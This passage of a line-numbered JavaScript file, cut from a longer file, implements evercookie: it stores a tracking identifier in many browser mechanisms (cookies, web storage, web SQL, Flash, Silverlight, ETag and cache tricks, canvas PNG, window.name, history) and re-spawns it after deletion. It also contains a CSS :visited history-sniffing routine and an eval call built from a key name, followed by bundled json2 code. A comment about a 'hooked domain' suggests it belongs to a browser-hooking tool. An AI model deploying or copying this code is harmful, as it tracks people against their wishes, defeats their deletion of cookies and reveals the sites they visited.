186 self.evercookie_etag(name, value);
187 self.evercookie_cache(name, value);
188 self.evercookie_lso(name, value);
189 self.evercookie_silverlight(name, value);
190
191 self._ec.userData = self.evercookie_userdata(name, value);
192 self._ec.cookieData = self.evercookie_cookie(name, value);
193 self._ec.localData = self.evercookie_local_storage(name, value);
194 self._ec.globalData = self.evercookie_global_storage(name, value);
195 self._ec.sessionData = self.evercookie_session_storage(name, value);
196 self._ec.windowData = self.evercookie_window(name, value);
197
198 if (_ec_history)
199 self._ec.historyData = self.evercookie_history(name, value);
200 }
201
202 // when writing data, we need to make sure lso and silverlight object is there
203 if (typeof value != 'undefined')
204 {
205 if (
206 (
207 (typeof _global_lso == 'undefined') ||
208 (typeof _global_isolated == 'undefined')
209 )
210 && i++ < _ec_tests
211 )
212 setTimeout(function() { self._evercookie(name, cb, value, i, dont_reset) }, 300);
213 }
214
215 // when reading data, we need to wait for swf, db, silverlight and png
216 else
217 {
218 if (
219 (
220 // we support local db and haven't read data in yet
221 (window.openDatabase && typeof self._ec.dbData == 'undefined') ||
222 (typeof _global_lso == 'undefined') ||
223 (typeof self._ec.etagData == 'undefined') ||
224 (typeof self._ec.cacheData == 'undefined') ||
225 (document.createElement('canvas').getContext && (typeof self._ec.pngData == 'undefined' || self._ec.pngData == '')) ||
226 (typeof _global_isolated == 'undefined')
227 )
228 &&
229 i++ < _ec_tests
230 )
231 {
232 setTimeout(function() { self._evercookie(name, cb, value, i, dont_reset) }, 300);
233 }
234
235 // we hit our max wait time or got all our data
236 else
237 {
238 // get just the piece of data we need from swf
239 self._ec.lsoData = self.getFromStr(name, _global_lso);
240 _global_lso = undefined;
241
242 // get just the piece of data we need from silverlight
243 self._ec.slData = self.getFromStr(name, _global_isolated);
244 _global_isolated = undefined;
245
246 var tmpec = self._ec;
247 self._ec = {};
248
249 // figure out which is the best candidate
250 var candidates = new Array();
251 var bestnum = 0;
252 var candidate;
253 for (var item in tmpec)
254 {
255 if (typeof tmpec[item] != 'undefined' && typeof tmpec[item] != 'null' && tmpec[item] != '' &&
256 tmpec[item] != 'null' && tmpec[item] != 'undefined' && tmpec[item] != null)
257 {
258 candidates[tmpec[item]] = typeof candidates[tmpec[item]] == 'undefined' ? 1 : candidates[tmpec[item]] + 1;
259 }
260 }
261
262 for (var item in candidates)
263 {
264 if (candidates[item] > bestnum)
265 {
266 bestnum = candidates[item];
267 candidate = item;
268 }
269 }
270
271 // reset cookie everywhere
272 if (typeof dont_reset == "undefined" || dont_reset != 1)
273 self.set(name, candidate);
274
275 if (typeof cb == 'function')
276 cb(candidate, tmpec);
277 }
278 }
279};
280
281this.evercookie_window = function(name, value)
282{
283 try {
284 if (typeof(value) != "undefined")
285 window.name = _ec_replace(window.name, name, value);
286 else
287 return this.getFromStr(name, window.name);
288 } catch(e) { }
289};
290
291this.evercookie_userdata = function(name, value)
292{
293 try {
294 var elm = this.createElem('div', 'userdata_el', 1);
295 elm.style.behavior = "url(#default#userData)";
296
297 if (typeof(value) != "undefined")
298 {
299 elm.setAttribute(name, value);
300 elm.save(name);
301 }
302 else
303 {
304 elm.load(name);
305 return elm.getAttribute(name);
306 }
307 } catch(e) { }
308};
309
310this.evercookie_cache = function(name, value)
311{
312 if (typeof(value) != "undefined")
313 {
314 // make sure we have evercookie session defined first
315 document.cookie = 'evercookie_cache=' + value;
316
317 // evercookie_cache.php handles caching
318 var img = new Image();
319 img.style.visibility = 'hidden';
320 img.style.position = 'absolute';
321 img.src = 'evercookie_cache.php?name=' + name;
322 }
323 else
324 {
325 // interestingly enough, we want to erase our evercookie
326 // http cookie so the php will force a cached response
327 var origvalue = this.getFromStr('evercookie_cache', document.cookie);
328 self._ec.cacheData = undefined;
329 document.cookie = 'evercookie_cache=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
330
331 $.ajax({
332 url: 'evercookie_cache.php?name=' + name,
333 success: function(data) {
334 // put our cookie back
335 document.cookie = 'evercookie_cache=' + origvalue + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
336
337 self._ec.cacheData = data;
338 }
339 });
340 }
341};
342
343this.evercookie_etag = function(name, value)
344{
345 if (typeof(value) != "undefined")
346 {
347 // make sure we have evercookie session defined first
348 document.cookie = 'evercookie_etag=' + value;
349
350 // evercookie_etag.php handles etagging
351 var img = new Image();
352 img.style.visibility = 'hidden';
353 img.style.position = 'absolute';
354 img.src = 'evercookie_etag.php?name=' + name;
355 }
356 else
357 {
358 // interestingly enough, we want to erase our evercookie
359 // http cookie so the php will force a cached response
360 var origvalue = this.getFromStr('evercookie_etag', document.cookie);
361 self._ec.etagData = undefined;
362 document.cookie = 'evercookie_etag=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
363
364 $.ajax({
365 url: 'evercookie_etag.php?name=' + name,
366 success: function(data) {
367 // put our cookie back
368 document.cookie = 'evercookie_etag=' + origvalue + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
369
370 self._ec.etagData = data;
371 }
372 });
373 }
374};
375
376this.evercookie_lso = function(name, value)
377{
378 var div = document.getElementById('swfcontainer');
379 if (!div)
380 {
381 div = document.createElement("div");
382 div.setAttribute('id', 'swfcontainer');
383 document.body.appendChild(div);
384 }
385
386 var flashvars = {};
387 if (typeof value != 'undefined')
388 flashvars.everdata = name + '=' + value;
389
390 var params = {};
391 params.swliveconnect = "true";
392 var attributes = {};
393 attributes.id = "myswf";
394 attributes.name = "myswf";
395 swfobject.embedSWF("evercookie.swf", "swfcontainer", "1", "1", "9.0.0", false, flashvars, params, attributes);
396};
397
398this.evercookie_png = function(name, value)
399{
400 if (document.createElement('canvas').getContext)
401 {
402 if (typeof(value) != "undefined")
403 {
404 // make sure we have evercookie session defined first
405 document.cookie = 'evercookie_png=' + value;
406
407 // evercookie_png.php handles the hard part of generating the image
408 // based off of the http cookie and returning it cached
409 var img = new Image();
410 img.style.visibility = 'hidden';
411 img.style.position = 'absolute';
412 img.src = 'evercookie_png.php?name=' + name;
413 }
414 else
415 {
416 self._ec.pngData = undefined;
417 var context = document.createElement('canvas');
418 context.style.visibility = 'hidden';
419 context.style.position = 'absolute';
420 context.width = 200;
421 context.height = 1;
422 var ctx = context.getContext('2d');
423
424 // interestingly enough, we want to erase our evercookie
425 // http cookie so the php will force a cached response
426 var origvalue = this.getFromStr('evercookie_png', document.cookie);
427 document.cookie = 'evercookie_png=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
428
429 var img = new Image();
430 img.style.visibility = 'hidden';
431 img.style.position = 'absolute';
432 img.src = 'evercookie_png.php?name=' + name;
433
434 img.onload = function()
435 {
436 // put our cookie back
437 document.cookie = 'evercookie_png=' + origvalue + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
438
439 self._ec.pngData = '';
440 ctx.drawImage(img,0,0);
441
442 // get CanvasPixelArray from given coordinates and dimensions
443 var imgd = ctx.getImageData(0, 0, 200, 1);
444 var pix = imgd.data;
445
446 // loop over each pixel to get the "RGB" values (ignore alpha)
447 for (var i = 0, n = pix.length; i < n; i += 4)
448 {
449 if (pix[i ] == 0) break;
450 self._ec.pngData += String.fromCharCode(pix[i]);
451 if (pix[i+1] == 0) break;
452 self._ec.pngData += String.fromCharCode(pix[i+1]);
453 if (pix[i+2] == 0) break;
454 self._ec.pngData += String.fromCharCode(pix[i+2]);
455 }
456 }
457 }
458 }
459};
460
461this.evercookie_local_storage = function(name, value)
462{
463 try
464 {
465 if (window.localStorage)
466 {
467 if (typeof(value) != "undefined")
468 localStorage.setItem(name, value);
469 else
470 return localStorage.getItem(name);
471 }
472 }
473 catch (e) { }
474};
475
476this.evercookie_database_storage = function(name, value)
477{
478 try
479 {
480 if (window.openDatabase)
481 {
482 var database = window.openDatabase("sqlite_evercookie", "", "evercookie", 1024 * 1024);
483
484 if (typeof(value) != "undefined")
485 database.transaction(function(tx)
486 {
487 tx.executeSql("CREATE TABLE IF NOT EXISTS cache(" +
488 "id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT, " +
489 "name TEXT NOT NULL, " +
490 "value TEXT NOT NULL, " +
491 "UNIQUE (name)" +
492 ")", [], function (tx, rs) { }, function (tx, err) { });
493
494 tx.executeSql("INSERT OR REPLACE INTO cache(name, value) VALUES(?, ?)", [name, value],
495 function (tx, rs) { }, function (tx, err) { })
496 });
497 else
498 {
499 database.transaction(function(tx)
500 {
501 tx.executeSql("SELECT value FROM cache WHERE name=?", [name],
502 function(tx, result1) {
503 if (result1.rows.length >= 1)
504 self._ec.dbData = result1.rows.item(0)['value'];
505 else
506 self._ec.dbData = '';
507 }, function (tx, err) { })
508 });
509 }
510 }
511 } catch(e) { }
512};
513
514this.evercookie_session_storage = function(name, value)
515{
516 try
517 {
518 if (window.sessionStorage)
519 {
520 if (typeof(value) != "undefined")
521 sessionStorage.setItem(name, value);
522 else
523 return sessionStorage.getItem(name);
524 }
525 } catch(e) { }
526};
527
528this.evercookie_global_storage = function(name, value)
529{
530 if (window.globalStorage)
531 {
532 var host = this.getHost();
533
534 try
535 {
536 if (typeof(value) != "undefined")
537 eval("globalStorage[host]." + name + " = value");
538 else
539 return eval("globalStorage[host]." + name);
540 } catch(e) { }
541 }
542};
543this.evercookie_silverlight = function(name, value) {
544 /*
545 * Create silverlight embed
546 *
547 * Ok. so, I tried doing this the proper dom way, but IE chokes on appending anything in object tags (including params), so this
548 * is the best method I found. Someone really needs to find a less hack-ish way. I hate the look of this shit.
549 */
550 var source = "evercookie.xap";
551 var minver = "4.0.50401.0";
552
553 var initParam = "";
554 if(typeof(value) != "undefined")
555 initParam = '<param name="initParams" value="'+name+'='+value+'" />';
556
557 var html =
558 '<object data="data:application/x-silverlight-2," type="application/x-silverlight-2" id="mysilverlight" width="0" height="0">' +
559 initParam +
560 '<param name="source" value="'+source+'"/>' +
561 '<param name="onLoad" value="onSilverlightLoad"/>' +
562 '<param name="onError" value="onSilverlightError"/>' +
563 '<param name="background" value="Transparent"/>' +
564 '<param name="windowless" value="true"/>' +
565 '<param name="minRuntimeVersion" value="'+minver+'"/>' +
566 '<param name="autoUpgrade" value="true"/>' +
567 '<a href="http://go.microsoft.com/fwlink/?LinkID=149156&v='+minver+'" style="text-decoration:none">' +
568 '<img src="http://go.microsoft.com/fwlink/?LinkId=108181" alt="Get Microsoft Silverlight" style="border-style:none"/>' +
569 '</a>' +
570 '</object>';
571 document.body.innerHTML+=html;
572};
573
574// public method for encoding
575this.encode = function (input) {
576 var output = "";
577 var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
578 var i = 0;
579
580 input = this._utf8_encode(input);
581
582 while (i < input.length) {
583
584 chr1 = input.charCodeAt(i++);
585 chr2 = input.charCodeAt(i++);
586 chr3 = input.charCodeAt(i++);
587
588 enc1 = chr1 >> 2;
589 enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
590 enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
591 enc4 = chr3 & 63;
592
593 if (isNaN(chr2)) {
594 enc3 = enc4 = 64;
595 } else if (isNaN(chr3)) {
596 enc4 = 64;
597 }
598
599 output = output +
600 _baseKeyStr.charAt(enc1) + _baseKeyStr.charAt(enc2) +
601 _baseKeyStr.charAt(enc3) + _baseKeyStr.charAt(enc4);
602
603 }
604
605 return output;
606};
607
608// public method for decoding
609this.decode = function (input) {
610 var output = "";
611 var chr1, chr2, chr3;
612 var enc1, enc2, enc3, enc4;
613 var i = 0;
614
615 input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
616
617 while (i < input.length) {
618 enc1 = _baseKeyStr.indexOf(input.charAt(i++));
619 enc2 = _baseKeyStr.indexOf(input.charAt(i++));
620 enc3 = _baseKeyStr.indexOf(input.charAt(i++));
621 enc4 = _baseKeyStr.indexOf(input.charAt(i++));
622
623 chr1 = (enc1 << 2) | (enc2 >> 4);
624 chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
625 chr3 = ((enc3 & 3) << 6) | enc4;
626
627 output = output + String.fromCharCode(chr1);
628
629 if (enc3 != 64) {
630 output = output + String.fromCharCode(chr2);
631 }
632 if (enc4 != 64) {
633 output = output + String.fromCharCode(chr3);
634 }
635
636 }
637
638 output = this._utf8_decode(output);
639
640 return output;
641
642};
643
644// private method for UTF-8 encoding
645this._utf8_encode = function (string) {
646 string = string.replace(/\r\n/g,"\n");
647 var utftext = "";
648
649 for (var n = 0; n < string.length; n++) {
650
651 var c = string.charCodeAt(n);
652
653 if (c < 128) {
654 utftext += String.fromCharCode(c);
655 }
656 else if((c > 127) && (c < 2048)) {
657 utftext += String.fromCharCode((c >> 6) | 192);
658 utftext += String.fromCharCode((c & 63) | 128);
659 }
660 else {
661 utftext += String.fromCharCode((c >> 12) | 224);
662 utftext += String.fromCharCode(((c >> 6) & 63) | 128);
663 utftext += String.fromCharCode((c & 63) | 128);
664 }
665
666 }
667
668 return utftext;
669};
670
671// private method for UTF-8 decoding
672this._utf8_decode = function (utftext) {
673 var string = "";
674 var i = 0;
675 var c = c1 = c2 = 0;
676
677 while ( i < utftext.length ) {
678
679 c = utftext.charCodeAt(i);
680
681 if (c < 128) {
682 string += String.fromCharCode(c);
683 i++;
684 }
685 else if((c > 191) && (c < 224)) {
686 c2 = utftext.charCodeAt(i+1);
687 string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
688 i += 2;
689 }
690 else {
691 c2 = utftext.charCodeAt(i+1);
692 c3 = utftext.charCodeAt(i+2);
693 string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
694 i += 3;
695 }
696
697 }
698
699 return string;
700};
701
702// this is crazy but it's 4am in dublin and i thought this would be hilarious
703// blame the guinness
704this.evercookie_history = function(name, value)
705{
706 // - is special
707 var baseStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=-";
708 var baseElems = baseStr.split("");
709
710 // sorry google.
711 var url = 'http://www.google.com/evercookie/cache/' + this.getHost() + '/' + name;
712
713 if (typeof(value) != "undefined")
714 {
715 // don't reset this if we already have it set once
716 // too much data and you can't clear previous values
717 if (this.hasVisited(url))
718 return;
719
720 this.createIframe(url, 'if');
721 url = url + '/';
722
723 var base = this.encode(value).split("");
724 for (var i = 0; i < base.length; i++)
725 {
726 url = url + base[i];
727 this.createIframe(url, 'if' + i);
728 }
729
730 // - signifies the end of our data
731 url = url + '-';
732 this.createIframe(url, 'if_');
733 }
734 else
735 {
736 // omg you got csspwn3d
737 if (this.hasVisited(url))
738 {
739 url = url + '/';
740
741 var letter = "";
742 var val = "";
743 var found = 1;
744 while (letter != '-' && found == 1)
745 {
746 found = 0;
747 for (var i = 0; i < baseElems.length; i++)
748 {
749 if (this.hasVisited(url + baseElems[i]))
750 {
751 letter = baseElems[i];
752 if (letter != '-')
753 val = val + letter;
754 url = url + letter;
755 found = 1;
756 break;
757 }
758 }
759 }
760
761 // lolz
762 return this.decode(val);
763 }
764 }
765};
766
767this.createElem = function(type, name, append)
768{
769 var el;
770 if (typeof name != 'undefined' && document.getElementById(name))
771 el = document.getElementById(name);
772 else
773 el = document.createElement(type);
774 el.style.visibility = 'hidden';
775 el.style.position = 'absolute';
776
777 if (name)
778 el.setAttribute('id', name);
779
780 if (append)
781 document.body.appendChild(el);
782
783 return el;
784};
785
786this.createIframe = function(url, name)
787{
788 var el = this.createElem('iframe', name, 1);
789 el.setAttribute('src', url);
790 return el;
791};
792
793// wait for our swfobject to appear (swfobject.js to load)
794this.waitForSwf = function(i)
795{
796 if (typeof i == 'undefined')
797 i = 0;
798 else
799 i++;
800
801 // wait for ~2 seconds for swfobject to appear
802 if (i < _ec_tests && typeof swfobject == 'undefined')
803 setTimeout(function() { waitForSwf(i) }, 300);
804};
805
806this.evercookie_cookie = function(name, value)
807{
808 try{
809 if (typeof(value) != "undefined")
810 {
811 // expire the cookie first
812 document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
813 document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
814 }
815 else
816 return this.getFromStr(name, document.cookie);
817 }catch(e){
818 // the hooked domain is using HttpOnly, so we must set the hook ID in a different way.
819 // evercookie_userdata and evercookie_window will be used in this case.
820 }
821};
822
823// get value from param-like string (eg, "x=y&name=VALUE")
824this.getFromStr = function(name, text)
825{
826 if (typeof text != 'string')
827 return;
828
829 var nameEQ = name + "=";
830 var ca = text.split(/[;&]/);
831 for (var i = 0; i < ca.length; i++)
832 {
833 var c = ca[i];
834 while (c.charAt(0) == ' ')
835 c = c.substring(1, c.length);
836 if (c.indexOf(nameEQ) == 0)
837 return c.substring(nameEQ.length, c.length);
838 }
839};
840
841this.getHost = function()
842{
843 var domain = document.location.host;
844 if (domain.indexOf('www.') == 0)
845 domain = domain.replace('www.', '');
846 return domain;
847};
848
849this.toHex = function(str)
850{
851 var r = "";
852 var e = str.length;
853 var c = 0;
854 var h;
855 while (c < e)
856 {
857 h = str.charCodeAt(c++).toString(16);
858 while (h.length < 2)
859 h = "0" + h;
860 r += h;
861 }
862 return r;
863};
864
865this.fromHex = function(str)
866{
867 var r = "";
868 var e = str.length;
869 var s;
870 while (e >= 0)
871 {
872 s = e - 2;
873 r = String.fromCharCode("0x" + str.substring(s, e)) + r;
874 e = s;
875 }
876 return r;
877};
878
879/*
880 * css history knocker (determine what sites your visitors have been to)
881 *
882 * originally by Jeremiah Grossman
883 * http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html
884 *
885 * ported to additional browsers by Samy Kamkar
886 *
887 * compatible with ie6, ie7, ie8, ff1.5, ff2, ff3, opera, safari, chrome, flock
888 *
889 * - code@samy.pl
890 */
891
892
893this.hasVisited = function(url)
894{
895 if (this.no_color == -1)
896 {
897 var no_style = this._getRGB("http://samy-was-here-this-should-never-be-visited.com", -1);
898 if (no_style == -1)
899 this.no_color =
900 this._getRGB("http://samy-was-here-"+Math.floor(Math.random()*9999999)+"rand.com");
901 }
902
903 // did we give full url?
904 if (url.indexOf('https:') == 0 || url.indexOf('http:') == 0)
905 return this._testURL(url, this.no_color);
906
907 // if not, just test a few diff types if (exact)
908 return this._testURL("http://" + url, this.no_color) ||
909 this._testURL("https://" + url, this.no_color) ||
910 this._testURL("http://www." + url, this.no_color) ||
911 this._testURL("https://www." + url, this.no_color);
912};
913
914/* create our anchor tag */
915var _link = this.createElem('a', '_ec_rgb_link');
916
917/* for monitoring */
918var created_style;
919
920/* create a custom style tag for the specific link. Set the CSS visited selector to a known value */
921var _cssText = '#_ec_rgb_link:visited{display:none;color:#FF0000}';
922
923/* Methods for IE6, IE7, FF, Opera, and Safari */
924try {
925 created_style = 1;
926 var style = document.createElement('style');
927 if (style.styleSheet)
928 style.styleSheet.innerHTML = _cssText;
929 else if (style.innerHTML)
930 style.innerHTML = _cssText;
931 else
932 {
933 var cssT = document.createTextNode(_cssText);
934 style.appendChild(cssT);
935 }
936} catch (e) {
937 created_style = 0;
938}
939
940/* if test_color, return -1 if we can't set a style */
941this._getRGB = function (u, test_color) {
942 if (test_color && created_style == 0)
943 return -1;
944
945 /* create the new anchor tag with the appropriate URL information */
946 _link.href = u;
947 _link.innerHTML = u;
948 // not sure why, but the next two appendChilds always have to happen vs just once
949 document.body.appendChild(style);
950 document.body.appendChild(_link);
951
952 /* add the link to the DOM and save the visible computed color */
953 var color;
954 if (document.defaultView)
955 color = document.defaultView.getComputedStyle(_link, null).getPropertyValue('color');
956 else
957 color = _link.currentStyle['color'];
958
959 return color;
960};
961
962this._testURL = function(url, no_color){
963 var color = this._getRGB(url);
964
965 /* check to see if the link has been visited if the computed color is red */
966 if (color == "rgb(255, 0, 0)" || color == "#ff0000")
967 return 1;
968
969 /* if our style trick didn't work, just compare default style colors */
970 else if (no_color && color != no_color)
971 return 1;
972
973 /* not found */
974 return 0;
975}
976
977};
978
979return _class;
980})();
981
982
983/*
984 * Again, ugly workaround....same problem as flash.
985*/
986var _global_isolated;
987function onSilverlightLoad(sender, args) {
988 var control = sender.getHost();
989 _global_isolated = control.Content.App.getIsolatedStorage();
990}
991/*
992function onSilverlightError(sender, args) {
993 _global_isolated = "";
994
995}*/
996function onSilverlightError(sender, args) {
997 _global_isolated = "";
998}
999
1000
1001/*
1002 https://github.com/douglascrockford/JSON-js/blob/master/json2.js
1003 2011-02-23
1004
1005// Create a JSON object only if one does not already exist. We create the
1006// methods in a closure to avoid creating global variables.
1007*/
1008
1009var JSON;
1010if (!JSON) {
1011 JSON = {};
1012}
1013
1014(function () {
1015 "use strict";
1016
1017 function f(n) {
1018 // Format integers to have at least two digits.
1019 return n < 10 ? '0' + n : n;
1020 }
1021
1022 if (typeof Date.prototype.toJSON !== 'function') {
1023
1024 Date.prototype.toJSON = function (key) {
1025
1026 return isFinite(this.valueOf()) ?
1027 this.getUTCFullYear() + '-' +
1028 f(this.getUTCMonth() + 1) + '-' +
1029 f(this.getUTCDate()) + 'T' +
1030 f(this.getUTCHours()) + ':' +
1031 f(this.getUTCMinutes()) + ':' +
1032 f(this.getUTCSeconds()) + 'Z' : null;
1033 };
1034
1035 String.prototype.toJSON =
1036 Number.prototype.toJSON =
1037 Boolean.prototype.toJSON = function (key) {
1038 return this.valueOf();
1039 };
1040 }
1041
1042 var cx = /[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,
1043 escapable = /[\\\"\x00-\x1f\x7f-\x9f\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,
1044 gap,
1045 indent,
1046 meta = { // table of character substitutions
1047 '\b': '\\b',
1048 '\t': '\\t',
1049 '\n': '\\n',
1050 '\f': '\\f',
1051 '\r': '\\r',
1052 '"' : '\\"',
1053 '\\': '\\\\'
1054 },
1055 rep;
1056
1057
1058 function quote(string) {
1059
1060// If the string contains no control characters, no quote characters, and no
1061// backslash characters, then we can safely slap some quotes around it.
1062// Otherwise we must also replace the offending characters with safe escape
1063// sequences.
1064
1065 escapable.lastIndex = 0;
1066 return escapable.test(string) ? '"' + string.replace(escapable, function (a) {
1067 var c = meta[a];
1068 return typeof c === 'string' ? c :
1069 '\\u' + ('0000' + a.charCodeAt(0).toString(16)).slice(-4);
1070 }) + '"' : '"' + string + '"';
1071 }
1072
1073
1074 function str(key, holder) {
1075
1076// Produce a string from holder[key].
1077
1078 var i, // The loop counter.
1079 k, // The member key.
1080 v, // The member value.
1081 length,
1082 mind = gap,
1083 partial,
1084 value = holder[key];
1085
1086// If the value has a toJSON method, call it to obtain a replacement value.
1087
1088 if (value && typeof value === 'object' &&
1089 typeof value.toJSON === 'function') {
1090 value = value.toJSON(key);
1091 }
1092
1093// If we were called with a replacer function, then call the replacer to
1094// obtain a replacement value.
1095
1096 if (typeof rep === 'function') {
1097 value = rep.call(holder, key, value);
1098 }
1099
1100// What happens next depends on the value's type.
1101
1102 switch (typeof value) {
1103 case 'string':
1104 return quote(value);
1105
1106 case 'number':
1107
1108// JSON numbers must be finite. Encode non-finite numbers as null.
1109
1110 return isFinite(value) ? String(value) : 'null';
1111
1112 case 'boolean':
1113 case 'null':
1114
1115// If the value is a boolean or null, convert it to a string. Note:
1116// typeof null does not produce 'null'. The case is included here in
1117// the remote chance that this gets fixed someday.
1118
1119 return String(value);
1120
1121// If the type is 'object', we might be dealing with an object or an array or
1122// null.
1123
1124 case 'object':
1125
1126// Due to a specification blunder in ECMAScript, typeof null is 'object',
1127// so watch out for that case.
1128
1129 if (!value) {
1130 return 'null';
1131 }
1132
1133// Make an array to hold the partial results of stringifying this object value.
1134
1135 gap += indent;
1136 partial = [];
1137
1138// Is the value an array?
1139
1140 if (Object.prototype.toString.apply(value) === '[object Array]') {
1141
1142// The value is an array. Stringify every element. Use null as a placeholder
1143// for non-JSON values.
1144
1145 length = value.length;
1146 for (i = 0; i < length; i += 1) {
1147 partial[i] = str(i, value) || 'null';
1148 }
1149
1150// Join all of the elements together, separated with commas, and wrap them in
1151// brackets.
1152
1153 v = partial.length === 0 ? '[]' : gap ?
1154 '[\n' + gap + partial.join(',\n' + gap) + '\n' + mind + ']' :
1155 '[' + partial.join(',') + ']';
1156 gap = mind;
1157 return v;
1158 }
1159
1160// If the replacer is an array, use it to select the members to be stringified.
1161
1162 if (rep && typeof rep === 'object') {
1163 length = rep.length;
1164 for (i = 0; i < length; i += 1) {
1165 if (typeof rep[i] === 'string') {
1166 k = rep[i];
1167 v = str(k, value);
1168 if (v) {
1169 partial.push(quote(k) + (gap ? ': ' : ':') + v);
1170 }
1171 }
1172 }
1173 } else {
1174
1175// Otherwise, iterate through all of the keys in the object.
1176
1177 for (k in value) {
1178 if (Object.prototype.hasOwnProperty.call(value, k)) {
1179 v = str(k, value);
1180 if (v) {
1181 partial.push(quote(k) + (gap ? ': ' : ':') + v);
1182 }
1183 }
1184 }
1185 }
1186
1187// Join all of the member texts together, separated with commas,
1188// and wrap them in braces.
1189
1190 v = partial.length === 0 ? '{}' : gap ?
1191 '{\n' + gap + partial.join(',\n' + gap) + '\n' + mind + '}' :
1192 '{' + partial.join(',') + '}';
1193 gap = mind;
1194 return v;
1195 }
1196 }
1197
1198// If the JSON object does not yet have a stringify method, give it one.
1199
1200 if (typeof JSON.stringify !== 'function') {
1201 JSON.stringify = function (value, replacer, space) {
1202
1203// The stringify method takes a value and an optional replacer, and an optional
1204// space parameter, and returns a JSON text. The replacer can be a function
1205// that can replace values, or an array of strings that will select the keys.
1206// A default replacer method can be provided. Use of the space parameter can
1207// produce text that is more easily readable.
1208
1209 var i;
1210 gap = '';
1211 indent = '';
1212
1213// If the space parameter is a number, make an indent string containing that
1214// many spaces.
1215
1216 if (typeof space === 'number') {
1217 for (i = 0; i < space; i += 1) {
1218 indent += ' ';
1219 }
1220
1221// If the space parameter is a string, it will be used as the indent string.
1222
1223 } else if (typeof space === 'string') {
1224 indent = space;
1225 }
1226
1227// If there is a replacer, it must be a function or an array.
1228// Otherwise, throw an error.
1229
1230 rep = replacer;
1231 if (replacer && typeof replacer !== 'function' &&
1232 (typeof replacer !== 'object' ||
1233 typeof replacer.length !== 'number')) {
1234 throw new Error('JSON.stringify');
1235 }
1236
1237// Make a fake root object containing our value under the key of ''.
1238// Return the result of stringifying the value.
1239
1240 return str('', {'': value});
1241 };
1242 }
1243
1244
1245// If the JSON object does not yet have a parse method, give it one.
1246
1247 if (typeof JSON.parse !== 'function') {
1248 JSON.parse = function (text, reviver) {
1249
1250// The parse method takes a text and an optional reviver function, and returns
1251// a JavaScript value if the text is a valid JSON text.
1252
1253 var j;
1254
1255 function walk(holder, key) {
1256
1257// The walk method is used to recursively walk the resulting structure so
1258// that modifications can be made.
1259
1260 var k, v, value = holder[key];
1261 if (value && typeof value === 'object') {
1262 for (k in value) {
1263 if (Object.prototype.hasOwnProperty.call(value, k)) {
1264 v = walk(value, k);
1265 if (v !== undefined) {
1266 value[k] = v;
1267 } else {
1268 delete value[k];
1269 }
1270 }
1271 }
1272 }
1273 return reviver.call(holder, key, value);
1274 }
1275
1276
1277// Parsing happens in four stages. In the first stage, we replace certain
1278// Unicode characters with escape sequences. JavaScript handles many characters
1279// incorrectly, either silently deleting them, or treating them as line endings.
1280
1281 text = String(text);
1282 cx.lastIndex = 0;
1283 if (cx.test(text)) {
1284 text = text.replace(cx, function (a) {
1285 return '\\u' +
1286 ('0000' + a.charCodeAt(0).toString(16)).slice(-4);
1287 });
1288 }
1289
1290// In the second stage, we run the text against regular expressions that look
1291// for non-JSON patterns. We are especially concerned with '()' and 'new'
1292// because they can cause invocation, and '=' because it can cause mutation.
1293// But just to be safe, we want to reject all unexpected forms.
1294
1295// We split the second stage into 4 regexp operations in order to work around
1296// crippling inefficiencies in IE's and Safari's regexp engines. First we
1297// replace the JSON backslash pairs with '@' (a non-JSON character). Second, we
1298// replace all simple value tokens with ']' characters. Third, we delete all
1299// open brackets that follow a colon or comma or that begin the text. Finally,
1300// we look to see that the remaining characters are only whitespace or ']' or
1301// ',' or ':' or '{' or '}'. If that is so, then the text is safe for eval.
1302
1303 if (/^[\],:{}\s]*$/
1304 .test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')
1305 .replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g, ']')
1306 .replace(/(?:^|:|,)(?:\s*\[)+/g, ''))) {
1307
1308// In the third stage we use the eval function to compile the text into a
1309// JavaScript structure. The '{' operator is subject to a syntactic ambiguity
1310// in JavaScript: it can begin a block or an object literal. We wrap the text
1311// in parens to eliminate the ambiguity.
1312
1313 j = eval('(' + text + ')');
1314
1315// In the optional fourth stage, we recursively walk the new structure, passing
1316// each name/value pair to a reviver function for possible transformation.
1317
1318 return typeof reviver === 'function' ?
1319 walk({'': j}, '') : j;
1320 }
1321
1322// If the text is not JSON parseable, then a SyntaxError is thrown.
1323
1324 throw new SyntaxError('JSON.parse');
1325 };
1326 }
1327}());
1328
1329
1330
1331/* *******************************************
1332// Copyright 2010-2012, Anthony Hand
1333// mdetect : http://code.google.com/p/mobileesp/source/browse/JavaScript/mdetect.js r215
1334// LICENSE INFORMATION
1335// Licensed under the Apache License, Version 2.0 (the "License");
1336// you may not use this file except in compliance with the License.
1337// You may obtain a copy of the License at
1338// http://www.apache.org/licenses/LICENSE-2.0
1339// Unless required by applicable law or agreed to in writing,
1340// software distributed under the License is distributed on an
1341// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
1342// either express or implied. See the License for the specific
1343// language governing permissions and limitations under the License.
1344// *******************************************
1345*/
1346
